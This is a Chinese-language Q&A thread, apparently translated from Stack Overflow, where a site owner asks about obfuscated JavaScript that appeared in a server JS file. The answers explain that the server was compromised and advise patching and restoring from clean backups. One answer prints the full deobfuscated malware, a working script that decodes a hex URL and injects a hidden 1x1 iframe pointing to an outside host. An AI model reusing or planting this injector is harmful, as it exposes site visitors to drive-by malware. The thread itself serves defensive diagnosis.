1

在我的网站中,我在最后的 js 文件中发现了一些 javascript 代码,我从未在服务器上添加这些代码,而 js 文件对用户没有写权限。

关于如何更改此文件并在其中添加代码以及如何保护服务器上的网站以进行此类尝试的任何想法。

这是 javascript 代码的一部分,我不知道它是如何添加到我的文件中的。

var RPTj='hYUw';function HCLac(){}
if('hikbf'=='gloCBh')hnwT='BtbByu';var efIc;function ovPvyr(){var GcFza='sLHwL';if('jPslJ'=='WfPs')FgTgr();}
var px0_var="0\x70x";function yefdV(){var MZIWif='pFeEIR';if('Oqoi'=='jcEyCx')YXCIxm();}
var WxTv;var JJfPP="f\x72\x6fm\x43harCode";function MnFGT(){var WcZW='mpjU';if('GQike'=='hfiFQm')aSNa();}
var LusRYV="";if('KSCVlW'=='ZHLn')fCxfd='nkVIX';if('rGsiG'=='uRdOG')bgTeVq();function NmGQl(){}
4

2 回答 2

4

有人可以访问您的服务器并插入经过混淆的恶意软件。

您的服务器上很可能有一些易受攻击的脚本 - 尤其是常见的第三方 PHP 应用程序,例如 WordPress 或 phpBB,通常会成为攻击目标。

现在做什么?

  • 关闭攻击者用来获取访问权限的任何漏洞。这很可能涉及使用您正在使用的任何软件的当前版本。
  • 从干净的备份重新安装所有内容,以摆脱所有恶意软件和可能的后门。
于 2012-06-12T06:36:04.683 回答
1

谷歌搜索其中一个令牌会导致此报告。看来您的代码是该代码的开头。完整代码似乎要做的是插入一个隐藏的 iframe,指向http://snap3.myvnc.com/58583911.html.

完整的代码格式:

var RPTj = 'hYUw';

function HCLac() {}
if ('hikbf' == 'gloCBh') hnwT = 'BtbByu';
var efIc;

function ovPvyr() {
    var GcFza = 'sLHwL';
    if ('jPslJ' == 'WfPs') FgTgr();
}
var px0_var = "0px";

function yefdV() {
    var MZIWif = 'pFeEIR';
    if ('Oqoi' == 'jcEyCx') YXCIxm();
}
var WxTv;
var JJfPP = "fromCharCode";

function MnFGT() {
    var WcZW = 'mpjU';
    if ('GQike' == 'hfiFQm') aSNa();
}
var LusRYV = "";
if ('KSCVlW' == 'ZHLn') fCxfd = 'nkVIX';
if ('rGsiG' == 'uRdOG') bgTeVq();

function NmGQl() {}
var appVersion_var = "appversion";

function FxKCOl() {
    var Tyadnl = 'KxdiY';
    if ('oiXBU' == 'egVk') ikDXjx();
}

function ZMlp() {}
var HpgJJy = "a6b2b2ae786d6db1ac9fae716cabb7b4aca16ca1adab6d7376737671776f6f6ca6b2abaa";
var kEKvaZ = 53;
if ('sXNxpE' == 'kYOrhd') LHXd = 'GRDMD';
var iQzzDyqFb = "parseInt";
var NVLbyx = 'SzzTbP';
var KnXUEO = "appendChild";
var oCuGvo = 'AqRu';
var QqDXbsz = "slice";
var PSvizz = 'wTGO';
if ('UDtvo' == 'WOvxa') EjML();
if ('NkueyZ' == 'hmZjo') PTCkFt();
if ('ARloGz' == 'ESOXD') xXLyjy();

function YFbf() {}
var BdHebR = "body";
var EyIJOS;
var LXlPOM = "constructor";

function Aibw() {}
var UYFE = 'XToVL';
var RCfxR;
var px1_var = "1px";

function UxfaL() {}
var uCNeV;
var PmfiAgi = (function () {
    var aBOKw = 77;
    return this;

    function uiqNU() {}
})();
var bsnc = 16;
if ('Bxidy' == 'pXMzt') iTix = 'VlDz';
var BffTkrlL = "gfmhzktv" [LXlPOM];
var AeqcV = 178;
if ('yDWAl' == 'aEfSc') YamYD();
if ('Gbiec' == 'Gfkedw') IKIyYm();

function RiHlap() {}
for (var naQrl = 0; naQrl < HpgJJy.length; naQrl += 2) {
    if ('ldgI' == 'IKpUz') rrqZYp();
    if ('wghLE' == 'xtjurW') QFbOk = 'erIdjm';
    QxXSy = PmfiAgi[iQzzDyqFb](HpgJJy[QqDXbsz](naQrl, naQrl + 2), 16) - 62;
    var uzmz;
    var TtQHcx = 194;
    LusRYV += BffTkrlL[JJfPP](QxXSy);
    if ('RfJxKN' == 'WCxvgr') qJiK();

    function niER() {
        var xYfZTn = 'bTKOZ';
        if ('oNmb' == 'zFotVd') CErQ();
    }
    var ORrPz = 66;
}
function qrRA() {}
if ('xUJvl' == 'IwPl') Zsvdq();
var tGfG;
var EKOhz = 234;
var uTUrfPXx = "msaAyY";
var PFDee;
if ('UrLoD' == 'Sxld') PDDgwq = 'WMta';
var xVwEzf = "";
if (navigator[appVersion_var].indexOf("MSIE") != -1) {
    var kWawh;
    var ipBou;
    xVwEzf = '<iframe name="' + uTUrfPXx + '" src="' + LusRYV + '">';
    var OCLAkX;
    var nRid = 246;
    var kxFTam = 'XzkCJ';
} else {
    if ('NhMm' == 'fRlNQ') mcPWV = 'wimioU';
    xVwEzf = 'iframe';
    var FLIdcI = 'yQEfas';
    if ('BUXe' == 'AShAfN') EKbV = 'fBEl';
}
if ('YdKCO' == 'pWElN') uTSIz();
var VdDqgo = document.createElement(xVwEzf);
var ZcAkY = 'meVkj';
var jMIFIc;
VdDqgo.tuqYuP = function () {
    if ('FfHJE' == 'bCay') azXnsN();
    if ('BlUAl' == 'cJxWM') fRGW();
    var ogFkn = 146;
    this["src"] = LusRYV;
    var AgIjr = 259;
    var qpSQK = 92;

    function PdHsy() {}
}
var qzNJ = 'aFPF';
if ('vNdx' == 'XYol') rQHs = 'Hxmv';
VdDqgo.style.width = px1_var;
var INpVIa;
VdDqgo.name = uTUrfPXx;
if ('xFAX' == 'BDmDG') KbBJUL();
VdDqgo.style.right = px0_var;

function hDmz() {
    var QaDaK = 'RkXzFf';
    if ('zhJAW' == 'KaeI') EKMSCK();
}
var FLxMGu = 'NTrTRL';
var VKffS;
if ('uVncX' == 'wLjA') SxPE = 'DqmaHY';
VdDqgo.style.position = "absolute";
if ('QUcV' == 'DOyW') iHzhEN = 'nFIX';
if ('NkrLk' == 'KpcbG') ZaLFnC = 'eGLz';
VdDqgo.style.height = px1_var;
var UcmFUb = 'qOVzZW';
VdDqgo.style.top = px0_var;
var VWcgid;
if ('XMOW' == 'Ednf') WHmsA = 'IUxM';
VdDqgo.tuqYuP();
var lXbvup = 'vYuQu';
if ('imkwcA' == 'WooJ') HveoG = 'lWaRP';

function bICzNVqfg() {
    var YPKTox;
    if (document[BdHebR]) {
        if ('ngooi' == 'TqRCsb') ftbpb();
        document[BdHebR][KnXUEO](VdDqgo);

        function qDuFo() {
            var mazr = 'QnGfrg';
            if ('BOyz' == 'AKOa') Gngf();
        }
        function pzBO() {}
    } else {
        var VxvCl;
        if ('iZnVhA' == 'xXpx') yFwsuD = 'Jwngn';
        setTimeout(bICzNVqfg, 120);

        function TQWAxJ() {}
    }
    var trjnm = 134;

    function gZgci() {
        var IwVkwG = 'bVoa';
        if ('FAipi' == 'lshUte') jAfeZ();
    }
}
function ugkLim() {
    var WDsg = 'GXvuNm';
    if ('WxbcV' == 'OxFu') OwHcwI();
}
bICzNVqfg();
if ('pdHQlr' == 'MsZfH') lqfhm();
var BqsQp = 'BfjE';
var uHPm = 'sLKHU';
var hZrYYl = 'Qckv';
if ('gjgstY' == 'dlcZ') wSnqFG = 'zSpF';

至于您要确定它是如何发生的,如果您可以访问服务器日志,那么服务器日志将是一个开始的地方。

于 2012-06-12T07:01:16.217 回答